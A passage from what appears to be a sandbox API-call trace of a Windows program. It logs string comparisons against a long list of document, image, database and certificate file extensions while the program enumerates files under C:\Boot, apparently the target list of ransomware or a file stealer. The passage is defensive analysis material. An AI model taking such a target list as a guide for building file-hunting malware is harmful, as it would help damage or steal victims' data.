4 [0286.339] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0286.339] lstrlenW (lpString=".backup") returned 7 [0286.339] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0286.339] lstrlenW (lpString=".bak") returned 4 [0286.339] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0286.339] lstrlenW (lpString=".bay") returned 4 [0286.339] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0286.340] lstrlenW (lpString=".bd") returned 3 [0286.340] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0286.340] lstrlenW (lpString=".bin") returned 4 [0286.340] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0286.340] lstrlenW (lpString=".bmp") returned 4 [0286.340] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0286.340] lstrlenW (lpString=".bz2") returned 4 [0286.340] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.340] lstrlenW (lpString=".c") returned 2 [0286.340] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0286.340] lstrlenW (lpString=".cdr") returned 4 [0286.340] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0286.340] lstrlenW (lpString=".cer") returned 4 [0286.340] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0286.340] lstrlenW (lpString=".cf") returned 3 [0286.340] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0286.340] lstrlenW (lpString=".cfc") returned 4 [0286.340] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0286.340] lstrlenW (lpString=".cfm") returned 4 [0286.340] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0286.340] lstrlenW (lpString=".cfml") returned 5 [0286.340] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0286.340] lstrlenW (lpString=".cfu") returned 4 [0286.340] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0286.340] lstrlenW (lpString=".chm") returned 4 [0286.340] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0286.340] lstrlenW (lpString=".cin") returned 4 [0286.340] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0286.340] lstrlenW (lpString=".class") returned 6 [0286.340] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0286.340] lstrlenW (lpString=".clx") returned 4 [0286.340] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0286.340] lstrlenW (lpString=".config") returned 7 [0286.341] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0286.341] lstrlenW (lpString=".cpp") returned 4 [0286.341] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".cr2") returned 4 [0286.341] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".crt") returned 4 [0286.341] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".crw") returned 4 [0286.341] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".cs") returned 3 [0286.341] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0286.341] lstrlenW (lpString=".css") returned 4 [0286.341] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".csv") returned 4 [0286.341] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".cub") returned 4 [0286.341] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".dae") returned 4 [0286.341] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".dat") returned 4 [0286.341] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".db") returned 3 [0286.341] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0286.341] lstrlenW (lpString=".dbf") returned 4 [0286.341] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".dbx") returned 4 [0286.341] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".dc3") returned 4 [0286.341] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".dcm") returned 4 [0286.341] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".dcr") returned 4 [0286.341] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0286.341] lstrlenW (lpString=".der") returned 4 [0286.341] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0286.342] lstrlenW (lpString=".dib") returned 4 [0286.342] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0286.342] lstrlenW (lpString=".dic") returned 4 [0286.342] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0286.342] lstrlenW (lpString=".dif") returned 4 [0286.342] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0286.342] lstrlenW (lpString=".divx") returned 5 [0286.342] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0286.342] lstrlenW (lpString=".djvu") returned 5 [0286.342] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0286.342] lstrlenW (lpString=".dng") returned 4 [0286.342] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0286.342] lstrlenW (lpString=".doc") returned 4 [0286.342] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.342] lstrlenW (lpString=".docm") returned 5 [0286.342] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0286.342] lstrlenW (lpString=".docx") returned 5 [0286.342] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.342] lstrlenW (lpString=".dot") returned 4 [0286.342] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0286.342] lstrlenW (lpString=".dotm") returned 5 [0286.342] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0286.342] lstrlenW (lpString=".dotx") returned 5 [0286.342] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0286.342] lstrlenW (lpString=".dpx") returned 4 [0286.342] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0286.342] lstrlenW (lpString=".dqy") returned 4 [0286.342] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0286.342] lstrlenW (lpString=".dsn") returned 4 [0286.342] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0286.342] lstrlenW (lpString=".dt") returned 3 [0286.342] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0286.342] lstrlenW (lpString=".dtd") returned 4 [0286.342] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0286.342] lstrlenW (lpString=".dwg") returned 4 [0286.343] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0286.343] lstrlenW (lpString=".dwt") returned 4 [0286.343] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0286.343] lstrlenW (lpString=".dx") returned 3 [0286.343] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0286.343] lstrlenW (lpString=".dxf") returned 4 [0286.343] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0286.343] lstrlenW (lpString=".edml") returned 5 [0286.343] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0286.343] lstrlenW (lpString=".efd") returned 4 [0286.343] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0286.343] lstrlenW (lpString=".elf") returned 4 [0286.343] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0286.343] lstrlenW (lpString=".emf") returned 4 [0286.343] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0286.343] lstrlenW (lpString=".emz") returned 4 [0286.343] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0286.343] lstrlenW (lpString=".epf") returned 4 [0286.343] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0286.343] lstrlenW (lpString=".eps") returned 4 [0286.343] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0286.343] lstrlenW (lpString=".epsf") returned 5 [0286.343] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0286.343] lstrlenW (lpString=".epsp") returned 5 [0286.343] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0286.343] lstrlenW (lpString=".erf") returned 4 [0286.343] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0286.343] lstrlenW (lpString=".exr") returned 4 [0286.343] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0286.343] lstrlenW (lpString=".f4v") returned 4 [0286.343] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0286.343] lstrlenW (lpString=".fido") returned 5 [0286.343] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0286.344] lstrlenW (lpString=".flm") returned 4 [0286.344] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0286.344] lstrlenW (lpString=".flv") returned 4 [0286.344] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0286.344] lstrlenW (lpString=".frm") returned 4 [0286.344] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0286.344] lstrlenW (lpString=".fxg") returned 4 [0286.344] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0286.344] lstrlenW (lpString=".geo") returned 4 [0286.344] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0286.344] lstrlenW (lpString=".gif") returned 4 [0286.344] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0286.344] lstrlenW (lpString=".grs") returned 4 [0286.344] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0286.344] lstrlenW (lpString=".gz") returned 3 [0286.344] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0286.344] lstrlenW (lpString=".h") returned 2 [0286.344] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0286.344] lstrlenW (lpString=".hdr") returned 4 [0286.344] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0286.344] lstrlenW (lpString=".hpp") returned 4 [0286.344] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0286.344] lstrlenW (lpString=".hta") returned 4 [0286.344] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0286.344] lstrlenW (lpString=".htc") returned 4 [0286.344] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0286.344] lstrlenW (lpString=".htm") returned 4 [0286.344] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0286.344] lstrlenW (lpString=".html") returned 5 [0286.344] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0286.344] lstrlenW (lpString=".icb") returned 4 [0286.344] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0286.344] lstrlenW (lpString=".ics") returned 4 [0286.345] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0286.345] lstrlenW (lpString=".iff") returned 4 [0286.345] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0286.345] lstrlenW (lpString=".inc") returned 4 [0286.345] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0286.345] lstrlenW (lpString=".indd") returned 5 [0286.345] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0286.345] lstrlenW (lpString=".ini") returned 4 [0286.345] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0286.345] lstrlenW (lpString=".iqy") returned 4 [0286.345] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0286.345] lstrlenW (lpString=".j2c") returned 4 [0286.345] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0286.345] lstrlenW (lpString=".j2k") returned 4 [0286.345] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0286.345] lstrlenW (lpString=".java") returned 5 [0286.345] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0286.345] lstrlenW (lpString=".jp2") returned 4 [0286.345] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0286.345] lstrlenW (lpString=".jpc") returned 4 [0286.345] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0286.345] lstrlenW (lpString=".jpe") returned 4 [0286.345] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0286.345] lstrlenW (lpString=".jpeg") returned 5 [0286.345] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0286.345] lstrlenW (lpString=".jpf") returned 4 [0286.345] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0286.345] lstrlenW (lpString=".jpg") returned 4 [0286.345] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.345] lstrlenW (lpString=".jpx") returned 4 [0286.345] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0286.345] lstrlenW (lpString=".js") returned 3 [0286.346] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0286.346] lstrlenW (lpString=".jsf") returned 4 [0286.346] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0286.346] lstrlenW (lpString=".json") returned 5 [0286.346] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0286.346] lstrlenW (lpString=".jsp") returned 4 [0286.346] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0286.346] lstrlenW (lpString=".kdc") returned 4 [0286.346] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0286.346] lstrlenW (lpString=".kmz") returned 4 [0286.346] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0286.346] lstrlenW (lpString=".kwm") returned 4 [0286.346] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0286.346] lstrlenW (lpString=".lasso") returned 6 [0286.346] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0286.346] lstrlenW (lpString=".lbi") returned 4 [0286.346] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0286.346] lstrlenW (lpString=".lgf") returned 4 [0286.346] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0286.346] lstrlenW (lpString=".lgp") returned 4 [0286.346] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0286.346] lstrlenW (lpString=".log") returned 4 [0286.346] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0286.346] lstrlenW (lpString=".m1v") returned 4 [0286.346] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0286.346] lstrlenW (lpString=".m4a") returned 4 [0286.346] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0286.346] lstrlenW (lpString=".m4v") returned 4 [0286.346] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0286.346] lstrlenW (lpString=".max") returned 4 [0286.346] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0286.347] lstrlenW (lpString=".md") returned 3 [0286.347] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0286.347] lstrlenW (lpString=".mda") returned 4 [0286.347] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0286.347] lstrlenW (lpString=".mdb") returned 4 [0286.347] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0286.347] lstrlenW (lpString=".mde") returned 4 [0286.347] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0286.347] lstrlenW (lpString=".mdf") returned 4 [0286.347] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0286.347] lstrlenW (lpString=".mdw") returned 4 [0286.347] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0286.347] lstrlenW (lpString=".mef") returned 4 [0286.347] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0286.347] lstrlenW (lpString=".mft") returned 4 [0286.347] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0286.347] lstrlenW (lpString=".mfw") returned 4 [0286.347] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0286.347] lstrlenW (lpString=".mht") returned 4 [0286.347] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0286.347] lstrlenW (lpString=".mhtml") returned 6 [0286.347] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0286.347] lstrlenW (lpString=".mka") returned 4 [0286.347] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0286.347] lstrlenW (lpString=".mkidx") returned 6 [0286.347] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0286.347] lstrlenW (lpString=".mkv") returned 4 [0286.347] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0286.347] lstrlenW (lpString=".mos") returned 4 [0286.347] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0286.347] lstrlenW (lpString=".mov") returned 4 [0286.347] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0286.348] lstrlenW (lpString=".mp3") returned 4 [0286.348] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0286.348] lstrlenW (lpString=".mp4") returned 4 [0286.348] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0286.348] lstrlenW (lpString=".mpeg") returned 5 [0286.348] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0286.348] lstrlenW (lpString=".mpg") returned 4 [0286.348] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0286.348] lstrlenW (lpString=".mpv") returned 4 [0286.348] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0286.348] lstrlenW (lpString=".mrw") returned 4 [0286.348] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0286.348] lstrlenW (lpString=".msg") returned 4 [0286.348] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0286.348] lstrlenW (lpString=".mxl") returned 4 [0286.348] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0286.348] lstrlenW (lpString=".myd") returned 4 [0286.348] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0286.348] lstrlenW (lpString=".myi") returned 4 [0286.348] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0286.348] lstrlenW (lpString=".nef") returned 4 [0286.348] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0286.348] lstrlenW (lpString=".nrw") returned 4 [0286.348] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0286.348] lstrlenW (lpString=".obj") returned 4 [0286.348] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0286.348] lstrlenW (lpString=".odb") returned 4 [0286.348] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0286.348] lstrlenW (lpString=".odc") returned 4 [0286.348] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0286.348] lstrlenW (lpString=".odm") returned 4 [0286.348] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0286.348] lstrlenW (lpString=".odp") returned 4 [0286.349] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".ods") returned 4 [0286.349] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".oft") returned 4 [0286.349] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".one") returned 4 [0286.349] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".onepkg") returned 7 [0286.349] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0286.349] lstrlenW (lpString=".onetoc2") returned 8 [0286.349] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0286.349] lstrlenW (lpString=".opt") returned 4 [0286.349] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".oqy") returned 4 [0286.349] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".orf") returned 4 [0286.349] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".p12") returned 4 [0286.349] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".p7b") returned 4 [0286.349] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".p7c") returned 4 [0286.349] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".pam") returned 4 [0286.349] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".pbm") returned 4 [0286.349] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".pct") returned 4 [0286.349] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".pcx") returned 4 [0286.349] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0286.349] lstrlenW (lpString=".pdd") returned 4 [0286.350] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0286.350] lstrlenW (lpString=".pdf") returned 4 [0286.350] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.350] lstrlenW (lpString=".pdp") returned 4 [0286.350] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0286.350] lstrlenW (lpString=".pef") returned 4 [0286.350] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0286.350] lstrlenW (lpString=".pem") returned 4 [0286.350] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0286.350] lstrlenW (lpString=".pff") returned 4 [0286.350] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0286.366] lstrlenW (lpString=".pfm") returned 4 [0286.366] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0286.366] lstrlenW (lpString=".pfx") returned 4 [0286.366] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0286.366] lstrlenW (lpString=".pgm") returned 4 [0286.366] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0286.366] lstrlenW (lpString=".php") returned 4 [0286.366] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0286.366] lstrlenW (lpString=".php3") returned 5 [0286.366] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0286.366] lstrlenW (lpString=".php4") returned 5 [0286.366] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0286.366] lstrlenW (lpString=".php5") returned 5 [0286.366] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0286.366] lstrlenW (lpString=".phtml") returned 6 [0286.366] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0286.366] lstrlenW (lpString=".pict") returned 5 [0286.367] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0286.367] lstrlenW (lpString=".pl") returned 3 [0286.367] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0286.367] lstrlenW (lpString=".pls") returned 4 [0286.367] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0286.367] lstrlenW (lpString=".pm") returned 3 [0286.367] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0286.367] lstrlenW (lpString=".png") returned 4 [0286.367] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0286.367] lstrlenW (lpString=".pnm") returned 4 [0286.367] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0286.367] lstrlenW (lpString=".pot") returned 4 [0286.367] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0286.367] lstrlenW (lpString=".potm") returned 5 [0286.367] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0286.367] lstrlenW (lpString=".potx") returned 5 [0286.367] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0286.367] lstrlenW (lpString=".ppa") returned 4 [0286.367] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0286.367] lstrlenW (lpString=".ppam") returned 5 [0286.367] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0286.367] lstrlenW (lpString=".ppm") returned 4 [0286.367] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0286.367] lstrlenW (lpString=".pps") returned 4 [0286.367] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0286.367] lstrlenW (lpString=".ppsm") returned 5 [0286.367] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0286.367] lstrlenW (lpString=".ppt") returned 4 [0286.367] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.367] lstrlenW (lpString=".pptm") returned 5 [0286.367] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0286.367] lstrlenW (lpString=".pptx") returned 5 [0286.367] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0286.368] lstrlenW (lpString=".prn") returned 4 [0286.368] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0286.368] lstrlenW (lpString=".ps") returned 3 [0286.368] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0286.368] lstrlenW (lpString=".psb") returned 4 [0286.368] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0286.368] lstrlenW (lpString=".psd") returned 4 [0286.368] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0286.368] lstrlenW (lpString=".pst") returned 4 [0286.368] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0286.368] lstrlenW (lpString=".ptx") returned 4 [0286.368] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0286.368] lstrlenW (lpString=".pub") returned 4 [0286.368] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0286.368] lstrlenW (lpString=".pwm") returned 4 [0286.368] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0286.368] lstrlenW (lpString=".pxr") returned 4 [0286.368] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0286.368] lstrlenW (lpString=".py") returned 3 [0286.368] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0286.368] lstrlenW (lpString=".qt") returned 3 [0286.368] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0286.368] lstrlenW (lpString=".r3d") returned 4 [0286.368] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0286.368] lstrlenW (lpString=".raf") returned 4 [0286.368] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0286.368] lstrlenW (lpString=".rar") returned 4 [0286.368] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.369] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0286.369] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0286.369] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.369] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6196d8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbcf473f, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xc63a0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0286.369] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0286.369] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.370] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x385f800 | out: 